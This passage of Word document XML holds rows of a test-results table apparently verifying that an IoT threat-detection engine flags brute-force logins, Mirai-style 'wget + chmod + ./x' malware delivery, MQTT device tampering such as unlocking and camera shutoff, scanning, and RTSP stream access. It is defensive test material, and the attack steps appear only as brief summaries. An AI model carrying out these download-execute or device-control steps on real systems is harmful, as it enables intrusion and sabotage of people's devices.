                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SSH/Telnet/HTTP/RTSP login attempts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">BRUTE_FORCE, CREDENTIAL_STUFFING, CREDENTIAL_COMPROMISE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">All three raised for every attacker IP (MEDIUM / MEDIUM / HIGH)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-DET-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Intel Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify malware delivery and Mirai behaviour are detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Simulator run completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Detection pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">wget + chmod + ./x; busybox probes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MALWARE_DELIVERY, MIRAI_SIGNATURE, POST_EXPLOITATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">MALWARE_DELIVERY CRITICAL (download + execute), MIRAI_SIGNATURE HIGH, POST_EXPLOITATION MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-DET-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Intel Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify MQTT broker abuse and device tampering are detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Simulator run completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Detection pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Wildcard subscribe, control publishes, unlock, camera off</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">BOTNET_C2, ICS_UNAUTHORIZED_COMMAND, DENIAL_OF_VIEW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">BOTNET_C2 HIGH; ICS_UNAUTHORIZED_COMMAND CRITICAL (unlock) and HIGH; DENIAL_OF_VIEW HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-DET-004</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Intel Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify scanning and exploitation are detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Simulator run completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Detection pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">19 scanner/exploit paths, port probes, RTSP route enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">WEB_SCAN, PROTOCOL_EXPLOIT, RECONNAISSANCE, RTSP_ROUTE_ENUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">All four raised (MEDIUM; PROTOCOL_EXPLOIT HIGH for known IoT exploit paths)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-DET-005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Intel Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify camera stream access and multi-protocol attacks are detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Simulator run completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Detection pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">RTSP PLAY with default credential; 5 protocols from one IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
